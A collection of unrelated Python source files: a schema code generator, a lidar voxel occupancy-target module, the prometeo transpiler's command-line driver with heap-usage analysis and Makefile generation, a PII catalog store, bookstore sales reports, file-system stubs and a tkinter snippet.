optional_namespace_def = "{indent}_namespace = {namespace!r}\n".format(
namespace=schema._namespace, indent=indent)
else:
optional_namespace_def = ""
field_defs = [
"{indent}{field_name} = {field!r}".format(field_name=field_name, field=field, indent=indent)
for field_name, field in schema._fields.iteritems()
]
if not field_defs:
field_defs = ["{indent}pass".format(indent=indent)]
return def_pattern.format(
class_name=schema._schema_name,
optional_namespace_def=optional_namespace_def,
field_defs="\n".join(field_defs),
indent=indent
)
class CachedGraphTraverser(object):
def __init__(self):
self.descendants = {}
self.started = set()
def find_descendants(self, a, max_depth=sys.getrecursionlimit()):
if a in self.descendants:
# fetch from cache
return self.descendants[a]
self.started.add(a)
subs = set()
if max_depth > 0:
if pyschema.ispyschema(a):
for _, field in a._fields.iteritems():
subs |= self.find_descendants(field, max_depth)
self.descendants[a] = subs
elif isinstance(a, types.List):
subs |= self.find_descendants(a.field_type, max_depth)
elif isinstance(a, types.Map):
subs |= self.find_descendants(a.value_type, max_depth)
elif isinstance(a, types.SubRecord):
subs.add(a._schema)
if a._schema not in self.started: # otherwise there is a circular reference
subs |= self.find_descendants(a._schema, max_depth-1)
self.started.remove(a)
return subs
def get_reference_ordered_schemas(self, schema_set):
for schema in schema_set:
self.find_descendants(schema)
descendants = copy.deepcopy(self.descendants) # a working copy
ordered_output = []
while descendants:
leaves = []
for root, referenced in descendants.iteritems():
if len(referenced) == 0:
leaves.append(root)
if not leaves:
raise SourceGenerationError("Circular reference in input schemas, aborting")
ordered_output += leaves
for leaf in leaves:
# remove all leaves
descendants.pop(leaf)
for root, referenced in descendants.iteritems():
if leaf in referenced:
referenced.remove(leaf)
return ordered_output
|
11557257
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from .occ_targets_template import OccTargetsTemplate
from ....utils import coords_utils, point_box_utils
class OccTargets3D(OccTargetsTemplate):
def __init__(self, model_cfg, voxel_size, point_cloud_range, data_cfg, grid_size,
num_class, voxel_centers):
super().__init__(model_cfg, voxel_size, point_cloud_range, data_cfg, grid_size,
num_class, voxel_centers)
self.reg = model_cfg.PARAMS.get("REG", False)
def create_predict_area(self, voxel_bnysynxsxnzsz, voxel_num_points_float, batch_size, batch_dict):
return self.create_predict_area2d(voxel_bnysynxsxnzsz, voxel_num_points_float, batch_size, batch_dict)
def forward(self, batch_dict, **kwargs):
# voxels: [M, max_points, ndim] float tensor. only contain points.
# voxel_coords: [M, 3] int32 tensor. zyx format.
# voxel_num_points: [M] int32 tensor.
voxel_features, voxel_num_points, coords = batch_dict['voxels'], batch_dict['voxel_num_points'], batch_dict['voxel_coords']
# print("voxel_features", voxel_features.shape)
voxel_count = voxel_features.shape[1]
# print("voxel_count", voxel_features.shape[0])
mask = self.get_paddings_indicator(voxel_num_points, voxel_count, axis=0)
batch_dict["voxel_point_mask"] = mask
batch_dict = self.create_voxel_res_label(batch_dict, mask) if self.reg else self.create_voxel_label(batch_dict, mask)
# if test inference speed
# if batch_dict["is_train"]:
# batch_dict = self.create_voxel_res_label(batch_dict, mask)
# else:
# batch_dict["point_dist_mask"] = torch.zeros((batch_dict["gt_boxes"].shape[0], self.ny, self.nx, self.nz * self.sz * self.sy * self.sx), device="cuda")
if "point_drop_inds" in batch_dict.keys():
inds = batch_dict["point_drop_inds"]
mask[inds[:, 0], inds[:, 1]] = torch.zeros_like(inds[:, 0], dtype=torch.bool)
batch_dict["final_point_mask"] = mask
return batch_dict
def create_voxel_res_label(self, batch_dict, valid_mask):
occ_pnts = torch.cat([coords_utils.uvd2absxyz(batch_dict['voxels'][..., 0], batch_dict['voxels'][..., 1], batch_dict['voxels'][..., 2], self.data_cfg.OCC.COORD_TYPE), batch_dict['voxels'][..., 3:]], dim=-1)
if self.point_coding == "absxyz" or self.point_coding == True:
batch_dict['voxels'] = occ_pnts
elif self.point_coding == "both":
batch_dict['voxels'] = torch.cat([occ_pnts[..., :3], batch_dict["voxels"]], dim=-1)
voxel_features, voxel_coords, gt_boxes_num, gt_boxes, bs = occ_pnts, batch_dict['voxel_coords'], batch_dict[
"gt_boxes_num"], batch_dict["gt_boxes"], batch_dict["gt_boxes"].shape[0]
if self.num_class == 1:
gt_label = (gt_boxes[..., -1:] > 1e-2).to(torch.float32)
gt_boxes = torch.cat([gt_boxes[..., :-1], gt_label], dim=-1)
valid_coords_bnznynx, valid_voxel_features = self.get_valid(valid_mask, voxel_coords, voxel_features)
voxelwise_mask = self.get_voxelwise_mask(valid_coords_bnznynx, bs)
vcc_mask = self.create_predict_area3d(bs, valid_coords_bnznynx)
occ_voxelwise_mask = self.filter_occ(self.occ_from_ocp(vcc_mask, batch_dict, bs, voxelwise_mask, valid_voxel_features[..., :3], valid_coords_bnznynx[..., 0], empty_sur_thresh=self.data_cfg.OCC.EMPT_SUR_THRESH, type=self.data_cfg.OCC.COORD_TYPE), occ_pnts, voxelwise_mask)
fore_voxelwise_mask, fore_res_mtrx, mirr_fore_voxelwise_mask, mirr_res_mtrx = self.get_fore_mirr_voxelwise_mask_res(batch_dict, bs, valid_coords_bnznynx, valid_voxel_features, gt_boxes_num, gt_boxes)
mirr_fore_voxelwise_mask = mirr_fore_voxelwise_mask * (1 - voxelwise_mask) # exclude original occupied
mirr_res_mtrx = mirr_res_mtrx * (1 - voxelwise_mask).unsqueeze(1)
if self.model_cfg.TARGETS.TMPLT:
bm_voxelwise_mask, bm_res_mtrx = self.get_bm_voxelwise_mask_res(batch_dict, bs, gt_boxes_num, gt_boxes)
bm_voxelwise_mask = bm_voxelwise_mask * (1 - voxelwise_mask) * (1 - mirr_fore_voxelwise_mask)
bm_res_mtrx = bm_res_mtrx * (1 - voxelwise_mask).unsqueeze(1) * (1 - mirr_fore_voxelwise_mask).unsqueeze(1)
else:
bm_voxelwise_mask = torch.zeros_like(voxelwise_mask, dtype=voxelwise_mask.dtype,
device=voxelwise_mask.device)
##### forebox_label #####
forebox_label = None
if self.data_cfg.OCC.BOX_WEIGHT != 1.0:
bs, max_num_box, box_c = list(gt_boxes.shape)
forebox_label = torch.zeros([bs, self.nz, self.ny, self.nx], dtype=torch.int8, device="cuda")
shift = torch.tensor(np.asarray([[0.0, 0.0, 0.0]]), device="cuda", dtype=torch.float32)
for i in range(bs):
cur_gt_boxes = gt_boxes[i, :gt_boxes_num[i]]
all_voxel_centers_2d = point_box_utils.rotatez(self.all_voxel_centers_2d, batch_dict["rot_z"][i]) if "rot_z" in batch_dict else self.all_voxel_centers_2d
voxel_box_label2d = point_box_utils.torch_points_in_box_2d_mask(all_voxel_centers_2d, cur_gt_boxes, shift=shift[..., :2]).view(self.ny, self.nx).nonzero()
if voxel_box_label2d.shape[0] > 0:
all_voxel_centers_filtered = self.all_voxel_centers[:, voxel_box_label2d[:, 0],
voxel_box_label2d[:, 1], ...].reshape(-1, 3)
if "rot_z" in batch_dict:
all_voxel_centers_filtered = point_box_utils.rotatez(all_voxel_centers_filtered, batch_dict["rot_z"][i])
voxel_box_label = point_box_utils.torch_points_in_box_3d_label(all_voxel_centers_filtered, cur_gt_boxes, gt_boxes_num[i], shift=shift)[0]
forebox_label[i, :, voxel_box_label2d[:, 0], voxel_box_label2d[:, 1]] = voxel_box_label.view(self.nz, -1)
if self.data_cfg.OCC.DROPOUT_RATE > 1e-3 and batch_dict["is_train"]:
batch_dict = self.dropout(batch_dict, fore_voxelwise_mask)
batch_dict = self.prepare_cls_loss_map(batch_dict, vcc_mask, voxelwise_mask, occ_voxelwise_mask, fore_voxelwise_mask, mirr_fore_voxelwise_mask, bm_voxelwise_mask, forebox_label=forebox_label)
batch_dict = self.prepare_reg_loss_map(batch_dict, fore_res_mtrx, mirr_res_mtrx, bm_res_mtrx)
return batch_dict
def get_bm_voxelwise_mask_res(self, batch_dict, bs, gt_boxes_num, gt_boxes):
bm_voxelwise_mask = torch.zeros([bs, self.nz, self.ny, self.nx], dtype=torch.uint8, device="cuda")
if "bm_points" in batch_dict and len(batch_dict["bm_points"]) > 0:
bm_binds, bm_carte_points = batch_dict["bm_points"][..., 0:1].to(torch.int64), batch_dict["bm_points"][...,1:]
label_array = torch.nonzero(point_box_utils.torch_points_in_box_3d_label_batch(bm_carte_points, bm_binds, gt_boxes, gt_boxes_num, bs))[..., 0]
bm_binds = bm_binds[..., 0][label_array]
bm_carte_points = bm_carte_points[label_array, :]
occ_coords_bm_points = coords_utils.cartesian_occ_coords(bm_carte_points, type=self.data_cfg.OCC.COORD_TYPE)
if "rot_z" in batch_dict:
rot_z = batch_dict["rot_z"][bm_binds]
if self.data_cfg.OCC.COORD_TYPE == "cartesian":
noise_rotation = -rot_z * np.pi / 180
occ_coords_bm_points = common_utils.rotate_points_along_z(occ_coords_bm_points.unsqueeze(1), noise_rotation).squeeze(1)
else:
occ_coords_bm_points[..., 1] += rot_z
inrange_coords_bm, inrange_inds_bm = self.point2coords_inrange(occ_coords_bm_points, self.point_origin_tensor, self.point_max_tensor, self.max_grid_tensor, self.min_grid_tensor, self.voxel_size)
bm_coords = torch.cat([bm_binds[inrange_inds_bm].unsqueeze(-1), self.xyz2zyx(inrange_coords_bm)], dim=-1)
bm_res_mtrx = self.get_mean_res(bm_carte_points[inrange_inds_bm], bm_coords, bs, self.nz, self.ny, self.nx, batch_dict, rot=True)
bm_voxelwise_mask[bm_coords[..., 0], bm_coords[..., 1], bm_coords[..., 2], bm_coords[..., 3]] = torch.ones_like(bm_coords[..., 0], dtype=torch.uint8, device=bm_voxelwise_mask.device) ##
else:
bm_res_mtrx = torch.zeros([bs, 3, self.nz, self.ny, self.nx], dtype=torch.float32, device="cuda")
return bm_voxelwise_mask, bm_res_mtrx
def get_mean_res(self, feat, coords, bs, nz, ny, nx, batch_dict, rot=False):
xyz_spatial = torch.zeros([bs, 3, nz, ny, nx], dtype=torch.float32, device="cuda")
if len(coords) > 0:
uni_coords, inverse_indices, labels_count = torch.unique(coords, return_inverse=True, return_counts=True, dim=0)
mean_xyz = torch.zeros([uni_coords.shape[0], 3], dtype=feat.dtype, device=feat.device).scatter_add_(0, inverse_indices.view(inverse_indices.size(0), 1).expand(-1, 3), feat[..., :3]) / labels_count.float().unsqueeze(1)
# mean_xyz = torch_scatter.scatter_mean(feat[..., :3], inverse_indices, dim=0)
mean_xyz -= self.get_voxel_center_xyz(uni_coords, batch_dict, rot=rot)
xyz_spatial[uni_coords[..., 0], :, uni_coords[..., 1], uni_coords[..., 2], uni_coords[..., 3]] = mean_xyz
return xyz_spatial
def get_voxel_center_xyz(self, coords, batch_dict, rot=True):
voxel_centers = (coords[:, [3, 2, 1]].float() + 0.5) * self.voxel_size + self.point_origin_tensor
if self.data_cfg.OCC.COORD_TYPE == "cartesian":
if "rot_z" in batch_dict and rot:
rot_z = batch_dict["rot_z"][coords[:, 0]]
noise_rotation = rot_z * np.pi / 180
voxel_centers = common_utils.rotate_points_along_z(voxel_centers.unsqueeze(1), noise_rotation).squeeze(1)
else:
if "rot_z" in batch_dict and rot:
rot_z = batch_dict["rot_z"][coords[:, 0]]
voxel_centers[..., 1] -= rot_z
voxel_centers = coords_utils.uvd2absxyz(voxel_centers[..., 0], voxel_centers[..., 1], voxel_centers[..., 2], self.data_cfg.OCC.COORD_TYPE)
return voxel_centers
def get_fore_mirr_voxelwise_mask_res(self, batch_dict, bs, valid_coords_bnznynx, valid_voxel_features, gt_boxes_num, gt_boxes):
fore_voxelwise_mask, mirr_fore_voxelwise_mask = [torch.zeros([bs, self.nz, self.ny, self.nx], dtype=torch.uint8, device="cuda") for i in range(2)]
fore_inds, mirr_inbox_point, mirr_binds = point_box_utils.torch_points_and_sym_in_box_3d_batch( valid_voxel_features[..., :3], valid_coords_bnznynx, gt_boxes, gt_boxes_num, bs, batch_dict['box_mirr_flag'])
fore_coords = valid_coords_bnznynx[fore_inds] # b zyx
fore_voxelwise_mask[fore_coords[..., 0], fore_coords[..., 1], fore_coords[..., 2], fore_coords[..., 3]] = torch.ones_like(fore_coords[..., 0], dtype=torch.uint8, device=fore_voxelwise_mask.device)
fore_res_mtrx = self.get_mean_res(valid_voxel_features[fore_inds], fore_coords, bs, self.nz, self.ny, self.nx, batch_dict, rot=True)
mirr_res_mtrx = torch.zeros([bs, 3, self.nz, self.ny, self.nx], device=fore_voxelwise_mask.device, dtype=torch.float32)
if mirr_inbox_point is not None:
occ_coords_mirr_points = coords_utils.cartesian_occ_coords(mirr_inbox_point, type=self.data_cfg.OCC.COORD_TYPE) # sphere x y z
if "rot_z" in batch_dict:
rot_z = batch_dict["rot_z"][mirr_binds]
if self.data_cfg.OCC.COORD_TYPE == "cartesian":
noise_rotation = -rot_z * np.pi / 180
occ_coords_mirr_points = common_utils.rotate_points_along_z(occ_coords_mirr_points.unsqueeze(1), noise_rotation).squeeze(1)
else:
occ_coords_mirr_points[..., 1] += rot_z
inrange_coords_mirr, inrange_inds_mirr = self.point2coords_inrange(occ_coords_mirr_points, self.point_origin_tensor, self.point_max_tensor, self.max_grid_tensor, self.min_grid_tensor, self.voxel_size)
mirr_coords = torch.cat([mirr_binds[inrange_inds_mirr].unsqueeze(-1), self.xyz2zyx(inrange_coords_mirr)], dim=-1) # mirror sphere b z y x
mirr_res_mtrx = self.get_mean_res(mirr_inbox_point[inrange_inds_mirr], mirr_coords, bs, self.nz, self.ny, self.nx, batch_dict, rot=True)
mirr_fore_voxelwise_mask[mirr_coords[..., 0], mirr_coords[..., 1], mirr_coords[..., 2], mirr_coords[..., 3]] = torch.ones_like(mirr_coords[..., 0], dtype=torch.uint8, device=mirr_fore_voxelwise_mask.device)
return fore_voxelwise_mask, fore_res_mtrx, mirr_fore_voxelwise_mask, mirr_res_mtrx
|
11557280
|
import ast
import astpretty as ap
# import typing
import sys
import argparse
import prometeo
import os
import platform
import subprocess
from strip_hints import strip_file_to_string
import json
import numpy as np
# from prometeo.mem.ast_analyzer import compute_reach_graph
from prometeo.mem.ast_analyzer import ast_visitor
from prometeo.mem.ast_analyzer import compute_reach_graph
from copy import deepcopy
import casadi as ca
import time
import re
from collections import OrderedDict
import numexpr
size_of_pointer = 8
size_of_int = 4
size_of_double = 8
makefile_template = '''
CC = gcc
CFLAGS += -fPIC -std=c99
HEAP64_SIZE = {{ HEAP64_SIZE }}
HEAP8_SIZE = {{ HEAP8_SIZE }}
INSTALL_DIR = {{ INSTALL_DIR }}
SRCS += {{ filename }}.c
CFLAGS+=-I$(INSTALL_DIR)/include/blasfeo -I$(INSTALL_DIR)/include/prometeo
CFLAGS+=-DHEAP64_SIZE=$(HEAP64_SIZE)
CFLAGS+=-DHEAP8_SIZE=$(HEAP8_SIZE)
LIBPATH+=-L$(INSTALL_DIR)/lib/blasfeo -L$(INSTALL_DIR)/lib/prometeo
{{ CASADI_TARGET }}
sources: $(SRCS)
\t$(CC) $(LIBPATH) -o {{ filename }} $(CFLAGS) $(SRCS) $(OBJS) -lcpmt -lblasfeo -lm
all: casadi sources
clean:
rm -f *.o {{ filename }}
'''
def str2bool(v):
if isinstance(v, bool):
return v
if v.lower() in ('True', 'true', 1):
return True
elif v.lower() in ('False', 'false', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def resolve_dims_value(dim_vars):
"""
Resolve value of dims and dimv variables.
Arguments:
dim_vars -- ordered dictionary that contains the unresolved dims and dimv variables
"""
for dim_var1_key, dim_var1_value in dim_vars.items():
if isinstance(dim_var1_value, list):
for i in range(len(dim_var1_value)):
for j in range(len(dim_var1_value[i])):
dim_value = dim_var1_value[i][j]
# check if the value of dim variables contains chars
chars = ''.join(re.split("[^a-zA-Z]*", dim_value)).replace(' ', '')
# if there are unresolved dim vars, then chars is non empty
if chars:
for dim_var2_key, dim_var2_value in dim_vars.items():
dim_value = re.sub(r'\b' + dim_var2_key + r'\b', dim_var2_value, dim_var1_value)
chars = ''.join(re.split("[^a-zA-Z]*", dim_value)).replace(' ', '')
if not chars:
break
if chars:
raise Exception('Could not resolve value {} of dims \
variable {}'.format(dim_var1_value, dim_var1_key))
dim_var1_value[i][j] = dim_value
else:
# check if the value of dim variables contains chars
chars = ''.join(re.split("[^a-zA-Z]*", dim_var1_value)).replace(' ', '')
# if there are unresolved dim vars, than chars is non empty
if chars:
for dim_var2_key, dim_var2_value in dim_vars.items():
if not isinstance(dim_var2_value, list):
dim_var1_value = re.sub(r'\b' + dim_var2_key + r'\b', dim_var2_value, dim_var1_value)
chars = ''.join(re.split("[^a-zA-Z]*", dim_var1_value)).replace(' ', '')
if not chars:
break
if chars:
raise Exception('Could not resolve value {} of dims variable \
{}'.format(dim_var1_value, dim_var1_key))
dim_vars[dim_var1_key] = dim_var1_value
return dim_vars
class Graph:
def __init__(self, nodes, edges, start, end, heap_start):
"""
Class that describes a graph used to compute
the worst-case memory usage of a program.
Parameters
----------
nodes : list of strings
list of nodes
edges : list of [(v1,v2), weight]
list of edges
start : str
name start node
end : str
name of end node
"""
self.nodes = dict()
for i in range(len(nodes)):
self.nodes[nodes[i]] = 0
self.nodes[start] = heap_start
self.edges = edges
self.start = start
self.end = end
def compute_shortes_path(self, max_iter=10000):
"""
Compute shortest path (worst-case memory usage) from self.start to self.end
using Bellman-Ford's algorithm.
Parameters
---------
max_iter : int
maximum number of iterations
Returns
-------
path_length : int
length of shortest path (-worst-case memory usage)
"""
for i in range(len(self.nodes)-1):
for j in range(len(self.edges)):
v1 = self.edges[j][0][0]
v2 = self.edges[j][0][1]
d_v1 = self.nodes[v1]
d_v2 = self.nodes[v2]
w = self.edges[j][1]
if d_v1 + w < d_v2:
self.nodes[self.edges[j][0][1]] = d_v1 + w
# check for negative cycles
for j in range(len(self.edges)):
v1 = self.edges[j][0][0]
v2 = self.edges[j][0][1]
d_v1 = self.nodes[v1]
d_v2 = self.nodes[v2]
w = self.edges[j][1]
if d_v1 + w < d_v2:
raise Exception('Negative cycle detected in call graph!')
return self.nodes[self.end]
def pmt_main():
"""
Method called by prometeo's command line utility `pmt`
"""
parser = argparse.ArgumentParser()
parser.add_argument("program_name", \
help="name of the prometeo script to be executed")
parser.add_argument("--cgen", type=str2bool, default="False", \
help="generate, compile and execute C code?")
parser.add_argument("--out", type=str, default=None, \
help="redirect output to file")
parser.add_argument("--debug", type=str, default=False, \
help="call raise instead of exit() upon Exception")
args = parser.parse_args()
filename = args.program_name
cgen = args.cgen
red_stdout = args.out
debug = args.debug
if cgen is False:
post = '''main()'''
code_no_hints = strip_file_to_string(filename) + post
tic = time.time()
exec(code_no_hints, globals(), globals())
toc = time.time() - tic
print('Execution time = {:0.3f} sec'.format(toc))
else:
try:
f = open(filename)
f.close()
except FileNotFoundError:
print('\n\033[;1m > prometeo:\033[0;0m \033[91m file {} not found.\033[0;0m'.format(filename))
exit()
print('\n\033[;1m > prometeo:\033[0;0m starting transpilation')
pmt_path = os.path.dirname(prometeo.__file__)
filename_ = filename.split('.')[0]
sed_cmd = "sed '/# pure >/,/# pure </d' " + filename_ + '.py'
code = ''.join(os.popen(sed_cmd).read())
tree = ast.parse(code)
# ap.pprint(tree)
tree_copy = deepcopy(tree)
try:
result = prometeo.cgen.code_gen_c.to_source(tree, filename_, \
main=True,
size_of_pointer = size_of_pointer, \
size_of_int = size_of_int, \
size_of_double = size_of_double)
except prometeo.cgen.code_gen_c.cgenException as e:
print('\n > Exception -- prometeo code-gen: ', e.message)
code = ''.join(open(filename))
print(' > @ line {}:'.format(e.lineno) + '\033[34m' + \
code.splitlines()[e.lineno-1] + '\033[0;0m')
print(' > Exiting.\n')
if debug:
raise
else:
return 1
dest_file = open('__pmt_cache__/' + filename_ + '.c', 'w')
dest_file.write(prometeo.cgen.source_repr.pretty_source(result.source))
dest_file.close()
dest_file = open('__pmt_cache__/' + filename_ + '.h', 'w')
dest_file.write(prometeo.cgen.source_repr.pretty_source(result.header))
dest_file.close()
print('\033[;1m > prometeo:\033[0;0m code-generation successfully completed')
print('\033[;1m > prometeo:\033[0;0m starting worst-case heap usage analysis')
# compute heap usage
# load log file
with open('__pmt_cache__/dim_record.json') as f:
dim_vars = json.load(f, object_pairs_hook=OrderedDict)
# reverse ordered dictionary to apply iterative resolution of expressions
dim_vars = OrderedDict(reversed(list(dim_vars.items())))
# resolve dims and dimv values
dim_vars = resolve_dims_value(dim_vars)
# evaluate numerical expressions
for key, value in dim_vars.items():
if isinstance(value, list):
for i in range(len(value)):
for j in range(len(value[i])):
dim_vars[key][i][j] = str(numexpr.evaluate(str(value[i][j])))
else:
dim_vars[key] = str(numexpr.evaluate(str(value)))
# load log file
with open('__pmt_cache__/heap64.json') as f:
heap64_data = json.load(f)
# resolve values of heap usage in calls
for key, value in heap64_data.items():
for item in dim_vars:
if item in heap64_data[key]:
heap64_data[key] = re.sub(r'\b' + item + r'\b', dim_vars[item], heap64_data[key])
# evaluate numerical expressions
for key, value in heap64_data.items():
heap64_data[key] = str(numexpr.evaluate(str(value)))
# load log file (8-byte aligned)
with open('__pmt_cache__/heap8.json') as f:
heap8_data = json.load(f)
# resolve values of heap usage in calls
for key, value in heap8_data.items():
for item in dim_vars:
if item in heap8_data[key]:
heap8_data[key] = re.sub(r'\b' + item + r'\b', dim_vars[item], heap8_data[key])
# evaluate numerical expressions
for key, value in heap8_data.items():
heap8_data[key] = str(numexpr.evaluate(str(value)))
visitor = ast_visitor()
visitor.visit(tree_copy)
call_graph = visitor.callees
typed_record = visitor.typed_record
meta_info = visitor.meta_info
# print('\ncall graph:\n\n', call_graph, '\n\n')
reach_map, call_graph = compute_reach_graph(\
call_graph, typed_record, meta_info)
# check that there are no cycles containing memory allocations
for method in reach_map:
if '*' in reach_map[method] and typed_record[method] != dict():
raise Exception('\n\nDetected cycle {} containing memory'
' allocation.\n'.format(reach_map[method]))
# update heap usage with memory associated with
# constructors (escape memory)
# load log file
with open('__pmt_cache__/constructor_record.json') as f:
constructors_list = json.load(f)
for caller, callees in call_graph.items():
for callee in callees:
# if call is a constructor, then account for
# escaped memory
if callee in constructors_list:
heap64_data[caller] = str(int(heap64_data[caller])
+ int(heap64_data[callee]))
heap8_data[caller] = str(int(heap8_data[caller])
+ int(heap8_data[callee]))
# print('reach_map:\n\n', reach_map, '\n\n')
# Bellman-Ford algorithm
# build memory graph (64-bytes aligned)
nodes = []
edges = []
for key, value in call_graph.items():
nodes.append(key)
for key, value in call_graph.items():
# if leaf node
if not value:
value = ['end']
for node in value:
if node in heap64_data:
heap_usage = -int(heap64_data[node])
else:
heap_usage = 0
# import pdb; pdb.set_trace()
edges.append([(key,node), heap_usage])
# add artificial end node
nodes.append('end')
if 'global@main' in heap64_data:
heap_main = -int(heap64_data['global@main'])
else:
heap_main = 0
mem_graph = Graph(nodes, edges, 'global@main', 'end', heap_main)
worst_case_heap_usage_64 = -mem_graph.compute_shortes_path()
# build memory graph (8-bytes aligned)
nodes = []
edges = []
for key, value in call_graph.items():
nodes.append(key)
for key, value in call_graph.items():
# if leaf node
if not value:
value = ['end']
for node in value:
if node in heap8_data:
heap_usage = -int(heap8_data[node])
else:
heap_usage = 0
# import pdb; pdb.set_trace()
edges.append([(key,node), heap_usage])
# add artificial end node
nodes.append('end')
if 'global@main' in heap8_data:
heap_main = -int(heap8_data['global@main'])
else:
heap_main = 0
mem_graph = Graph(nodes, edges, 'global@main', 'end', heap_main)
worst_case_heap_usage_8 = -mem_graph.compute_shortes_path()
print('\033[;1m > prometeo:\033[0;0m heap usage analysis completed successfully\n \
\033[34m{}\033[0;0m(\033[34m{}\033[0;0m) 64(8)-bytes aligned\n'.format(\
worst_case_heap_usage_64, worst_case_heap_usage_8))
# generate Makefile
makefile_code = makefile_template.replace('{{ filename }}', filename_)
makefile_code = makefile_code.replace('{{ HEAP8_SIZE }}', str(worst_case_heap_usage_8))
# NOTE: factor 2 due to alignment
makefile_code = makefile_code.replace('{{ HEAP64_SIZE }}', str(worst_case_heap_usage_64))
makefile_code = makefile_code.replace('\n','', 1)
makefile_code = makefile_code.replace('{{ INSTALL_DIR }}', os.path.dirname(__file__) + '/..')
with open('__pmt_cache__/casadi_funs.json') as f:
casadi_funs = json.load(f, object_pairs_hook=OrderedDict)
casadi_target_code = '\nOBJS = '
for item in casadi_funs:
fun_name = item.replace('@', '_')
casadi_target_code = casadi_target_code + ' ' + 'casadi_wrapper_' + fun_name + '.o ' + fun_name + '.o'
casadi_target_code = casadi_target_code + '\n\ncasadi: '
for item in casadi_funs:
fun_name = item.replace('@', '_')
casadi_target_code = casadi_target_code + ' ' + fun_name
for item in casadi_funs:
fun_name = item.replace('@', '_')
casadi_target_code = casadi_target_code + '\n\n'
casadi_target_code = casadi_target_code + fun_name + ':\n'
casadi_target_code = casadi_target_code + "\t$(CC) -c " + fun_name + '.c ' + 'casadi_wrapper_' + fun_name + '.c\n'
makefile_code = makefile_code.replace('{{ CASADI_TARGET }}', casadi_target_code)
dest_file = open('__pmt_cache__/Makefile', 'w+')
dest_file.write(makefile_code)
dest_file.close()
print('\033[;1m > prometeo:\033[0;0m building C code')
os.chdir('__pmt_cache__')
proc = subprocess.Popen(["make", "clean"], stdout=subprocess.PIPE)
try:
outs, errs = proc.communicate(timeout=20)
except TimeOutExpired:
proc.kill()
outs, errs = proc.communicate()
print('Command \'make\' timed out.')
if proc.returncode:
raise Exception('Command \'make\' failed with the above error.'
' Full command is:\n\n {}'.format(outs.decode()))
proc = subprocess.Popen(["make", "all"], stdout=subprocess.PIPE)
try:
outs, errs = proc.communicate(timeout=20)
except TimeOutExpired:
proc.kill()
outs, errs = proc.communicate()
print('Command \'make \' timed out.')
if proc.returncode:
raise Exception('Command \'make\' failed with the above error.'
' Full command is:\n\n {}'.format(outs.decode()))
print('\033[;1m > prometeo:\033[0;0m successfully built C code')
print('\033[;1m > prometeo:\033[0;0m running compiled C code:\n')
INSTALL_DIR = os.path.dirname(__file__) + '/..'
running_on = platform.system()
if running_on == 'Linux':
cmd = 'export LD_LIBRARY_PATH=' + INSTALL_DIR + '/lib/prometeo:' + \
INSTALL_DIR + '/lib/blasfeo:$LD_LIBRARY_PATH ; ./' + filename_
elif running_on == 'Darwin':
cmd = 'export DYLD_LIBRARY_PATH=' + INSTALL_DIR + '/lib/prometeo:' + \
INSTALL_DIR + '/lib/blasfeo:$DYLD_LIBRARY_PATH ; ./' + filename_
else:
raise Exception('Running on unsupported operating system {}'.format(running_on))
tic = time.time()
proc = subprocess.Popen([cmd], shell=True, stdout=subprocess.PIPE)
try:
outs, errs = proc.communicate()
except TimeOutExpired:
proc.kill()
outs, errs = proc.communicate()
print('Command {} timed out.'.format(cmd))
if red_stdout is not None:
with open(red_stdout, 'w') as f:
f.write(outs)
toc = time.time() - tic
if red_stdout is not None:
with open(red_stdout, 'w') as f:
f.write(outs.decode())
else:
print(outs.decode())
if proc.returncode:
raise Exception('Command {} failed with the above error.'
' Full command is:\n\n {}'.format(cmd, outs.decode()))
print('\n\033[;1m > prometeo:\033[0;0m exiting\n')
os.chdir('..')
|
11557287
|
from contextlib import closing
from dbcat import Catalog, catalog_connection, init_db, pull
from piicatcher.catalog import Store
class DbStore(Store):
@classmethod
def save_schemas(cls, explorer):
catalog: Catalog = catalog_connection(explorer.catalog_conf)
with closing(catalog) as catalog:
init_db(catalog)
with catalog.managed_session:
print("Connection: {}".format(explorer.connection_parameters))
source = catalog.add_source(
explorer.database.get_name(),
explorer.type,
**explorer.connection_parameters
)
pull(catalog, source.name)
schemas = explorer.get_schemas()
with catalog.managed_session:
for s in schemas:
for t in s.get_children():
for c in t.get_children():
column = catalog.get_column(
source_name=explorer.database.get_name(),
schema_name=s.get_name(),
table_name=t.get_name(),
column_name=c.get_name(),
)
if c.has_pii():
catalog.set_column_pii_type(
column, c.get_pii_types().pop()
)
|
11557346
|
import datetime
from bookstore import db
from bookstore.models import OrderList, Books
from flask_sqlalchemy import SQLAlchemy
#start of the month
def calc_start(y, m):
return datetime.datetime(y, m, 1)
#end of the month
def calc_end(y, m):
if m == 2:
if (y % 4) == 0:
if (y % 100) == 0:
if (y % 400) == 0:
return datetime.datetime(y, m, 29, 23, 59, 59)
else:
return datetime.datetime(y, m, 28, 23, 59, 59)
else:
return datetime.datetime(y, m, 29, 23, 59, 59)
else:
return datetime.datetime(y, m, 28, 23, 59, 59)
else:
if m <= 7:
if m % 2 == 0:
return datetime.datetime(y, m, 30, 23, 59, 59)
else:
return datetime.datetime(y, m, 31, 23, 59, 59)
else:
if m % 2 == 0:
return datetime.datetime(y, m, 31, 23, 59, 59)
else:
return datetime.datetime(y, m, 30, 23, 59, 59)
def total_sales_bw_b_e_admin(begin="2021-05-01", end="2021-05-31"):
return db.session.query(db.func.sum(OrderList.total_price)).filter(OrderList.selling_date >= begin, OrderList.selling_date <= end).scalar()
def total_books_bw_b_e_admin(book_id):
try:
return db.session.query(db.func.sum(OrderList.total_price)).filter(OrderList.book_ISBN == book_id).scalar()
except:
return 0
#total sales calculation
def calc_sales(y):
sales_yearly = list()
for i in range(1, 13):
beg = calc_start(y, i)
en = calc_end(y, i)
temp = total_sales_bw_b_e_admin(beg, en)
if temp is None:
temp = 0
sales_yearly.append(temp)
return sales_yearly
#for book wise sales
def book_wise():
books_yearly = dict()
for i in OrderList.query.with_entities(OrderList.book_ISBN).distinct():
temp = total_books_bw_b_e_admin(int(i[0]))
if temp is None:
temp = 0
book = Books.query.filter_by(bid=int(i[0])).first()
title = book.title
books_yearly[title] = temp
return books_yearly
|
11557356
|
class Folder:
def __init__(self, name):
self.name = name
self.children = {}
def add_child(self, child):
pass
def move(self, new_path):
pass
def copy(self, new_path):
pass
def delete(self):
pass
class File:
def __init__(self, name, contents):
self.name = name
self.contents = contents
def move(self, new_path):
pass
def copy(self, new_path):
pass
def delete(self):
pass
|
11557361
|
import tkinter as tk
# --- functions ---
def mouse_wheel(event):
global number
# respond to Linux or Windows wheel event
if event.num == 5 or event.delta == -120:
number -= 1
